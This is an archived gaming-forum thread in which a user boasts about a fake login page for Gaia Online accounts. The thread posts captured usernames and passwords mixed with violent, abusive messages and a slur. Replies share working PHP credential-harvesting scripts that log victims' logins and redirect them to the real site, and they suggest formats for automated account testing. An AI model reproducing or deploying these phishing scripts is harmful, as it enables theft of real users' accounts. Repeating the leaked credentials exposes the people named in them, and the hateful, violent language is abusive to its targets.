A preserved archive of the Logical Gamers community forums, 2009-2025. The original threads and posts, served read-only. Registration, posting and private messages are gone for good.

Someone Messing around on my flp.. Found this so funny.

1.3k views · started by linzblue ·
#1
Someone Messing around on my flp.. Found this so funny.
beastmasterUser= Uricacid Pass= beastmasterUser= Savage390 Pass= westwood52User= You fucking mother fucker,.... Pass= just die a horrible deathUser= JUST FUCKING DIE Pass= BitchUser= still reading? Pass= I hope you die on cancer,....User= bitch Pass= hope you get ballbusted lolUser= still reading?,... Pass= idiotUser= lol,... Pass= come one,... just dieUser= MOTHERFUCKER Pass= are you M? xDUser= Kaya Pass= SaraUser= Saint46 Pass= Tiger14User= did you actually try this? Pass= retarded piece of shitUser= I was already thinking if I should report this to the police lol Pass= hope you get busted,... User= kami Pass= asta1441User= Kurenai Pass= qwert123User= Shady Pass= Tim1!User= Can you maybe just die? Pass= 123456User= come one just die,... scum of the society,... Pass= you cunt,....User= still reading? Pass= you are really an idiot,,..User= cart912 Pass= csy124User= Sarasjevo Pass= BlackPanda!User= btw. you will get spammed to that now,... Pass= gonna post it on 4chan lolUser= cart912 Pass= csy123User= Imawesome1 Pass= Master!User= cart912 Pass= vsy123User= get a job where you really EARN money,... Pass= scumUser= aww,.... sorry,... I forgot,... no one would hire scum like you,.... Pass= can you just die?User= btw,... I really MEAN it,... for the sake of the soceity,.. just die,... criminal scum like has no right to live, Pass= And I really mean it!User= you are still reading? Pass= get a real job already,.. parasiteUser= laumarko Pass= jamjam17User= PKBeam Pass= SergioUser= Feeder21 Pass= holyshitUser= shadyviet Pass= rustedheartsUser= Namenlos Pass= Yester1441User= oskargb Pass= wolf1User= H3llz R3jectz Pass= KevinUser= DIE a horrible death already,... die on cancer and remember me,... Pass= Worthless scumUser= you are still trying? you are undestimating how activ some ppl are,..... Pass= bitchUser= iamsoawesome1 Pass= ChmiaraUser= you worthless piece of scum are stil reading? Pass= 123User= just as a sidenote,... hacking this IP is the last thing you do,... Pass= 123456User= do you know why? I Pass= User= do you know why? I\'m useing my \"comapnys\" ip,.... we got 200k employees,... guess which company it is you moron,.... Pass= btw. I still want you to DIEUser= Come on! hack me so I dont have problems to get you into jail,... Pass= just fucking move your assUser= whats wrong? you don\'t dare to take ma challenge? Pass= worthless piece of shitUser= Do you really expect any results from this? Pass= 1234567u8i9o0ßUser= Lets take a proper view at this,... unless there are only idiots and no normal ppl around,... you might get something from this,... but you already failed at the moment that some ppl who got a brain are around,... try somewhere else,... Pass= 1234567890User= bainrows Pass= maerchenUser= lol Pass= lolUser= Big gigantic buttz Pass= heyhackerUser= anima14 Pass= kuon11User= just fucking DIE,.. I hope you die because of cancer,... Pass= ..!.User= bitch Pass= fuck offUser=









Found it funny he thought I would be afraid of 4chan. Also found it funny he thinks he can report me to the police because his little gaia account got hacked.
#2
cool story bro
#3
Someone has too much time on their hands
#4
Bahahahahaha someone is fucking pissed.
#5
You really should use linebreaks in your file.
username : password is pretty conventional.
fwrite($file, $username . ':' . $password . "\n");
#6
i don't know how you'd take any pride in this, or even post it. jesus christ, as charles has said, use bloody carriage returns.
#7
Butts wrote:
i don't know how you'd take any pride in this, or even post it. jesus christ, as charles has said, use bloody carriage returns.


I don't get it, why don't more people say carriage returns? Isn't that what they're called?

Also, @OP:

<?php
$username = $_POST['username'];
$password = $_POST['password'];
$subject = "You have an account waiting for you!";
$body = "Someone fell for your FLP! Their username is " . $username . " and their password is " . $password . "! Happy hacking!";
$date = date("F j, Y");
$all = "Username: " . $username . "\n" . "Password: " . $password . "\n" . "Date: " . $date . "\n";
$file = "youraccountsnshit.txt";
$handle = fopen($file, "a+");
fwrite($handle, $all);
fclose($handle);
header ("Location: http://gaiaonline.com/inventory");
header("Content-type: text/plain");
print_r(htmlspecialchars(print_r($_POST, 1)));
?>


It even gives you the fuckin' date. Now stop making excuses and have a nice PHP file.
#8
the date is kind of redundant information as you don't really need it. You're just writing the accounts, and that's it. Unless you want it to be a time stamped mess.
<?php
$username = $_POST['username'];
$password = $_POST['password'];
$subject = "You have a gaiaonline account waiting for you!";
$body = "Someone fell for your fake bloody log in page! Their username is " . $username . " and their password is " . $password;
$all = $username . ":" . $password . "\n";
$file = "accounts.txt";
$handle = fopen($file, "a+");
fwrite($handle, $all);
fclose($handle);
header ("Location: https://gaiaonline.com/inventory");
header("Content-type: text/plain");
print_r(htmlspecialchars(print_r($_POST, 1)));
?>
#9
Butts wrote:
the date is kind of redundant information as you don't really need it. You're just writing the accounts, and that's it. Unless you want it to be a time stamped mess.
<?php
$username = $_POST['username'];
$password = $_POST['password'];
$subject = "You have a gaiaonline account waiting for you!";
$body = "Someone fell for your fake bloody log in page! Their username is " . $username . " and their password is " . $password;
$all = $username . ":" . $password . "\n";
$file = "accounts.txt";
$handle = fopen($file, "a+");
fwrite($handle, $all);
fclose($handle);
header ("Location: https://gaiaonline.com/inventory");
header("Content-type: text/plain");
print_r(htmlspecialchars(print_r($_POST, 1)));
?>


Well I had originally set up that PHP script to send you an email every time you get an account instead of recording it to a text file.

It's not a mess though, the log files look like this:

Username:
Password:
Date: February 4, 2013
Username:
Password:
Date: February 4, 2013
#10
Very funny, nice one.

However, you should list them instead of this large wall of text. It would make it more readable, and therefore more enjoyable.
#11
Sorry guy's and I will fix it with the file. Thanks very much(:

User= mother fucking bitch ill kill you Pass= fucker you took my 91 mil give it ackUser

Just got this. I never hacked a 91 mil. LOL
#12
Carriage returns aren't necessarily the same as line breaks. But they're more or less synonymous.

Programming doesn't work that way. Semantics in general doesn't work that way. Just because a particular term isn't used over another term doesn't make one or the other invalid. There is such a thing called nuances.
#13
Why are you all obsessed with having so much text in your output file? username : password works just as well. Do you really need it outlined which is the username and which is the password? Rich Mofo:hunter2 - I think I can figure it out. Timestamps are unnecessary. Especially spelled out. If you want stats on the days, just do like 2-3 for February 3rd. They just make it take longer to load the file, and make it a lot harder to create a bot that will automatically test your accounts for you (or otherwise interpret your results file).

user:pass (date)
Flare:dumb (2-3)
Charles Stover:smart (2-4)
ThirdNoob:hunter2 (2-4)

EZREADS
#14
Why are you all obsessed with having so much text in your output file? username : password works just as well. Do you really need it outlined which is the username and which is the password? Rich Mofo:hunter2 - I think I can figure it out. Timestamps are unnecessary. Especially spelled out. If you want stats on the days, just do like 2-3 for February 3rd. They just make it take longer to load the file, and make it a lot harder to create a bot that will automatically test your accounts for you (or otherwise interpret your results file).

user:pass (date)
Flare:dumb (2-3)
Charles Stover:nigger (2-4)
ThirdNoob:hunter2 (2-4)

EZREADS


u r bulli

nat niec
#15
It was me bro i was really bored.
#16
Mota wrote:
It was me bro i was really bored.


If it was I found it really funny.(;

Thanks.

Also I edited with his code. @FlareBoy<3
#17
Stop lying Mota.
I know for sure it wasn't you...
#18
Why did you find it so funny?
#19
Isonyx wrote:
Why did you find it so funny?


Cause the said the where going to get me arrested. ;D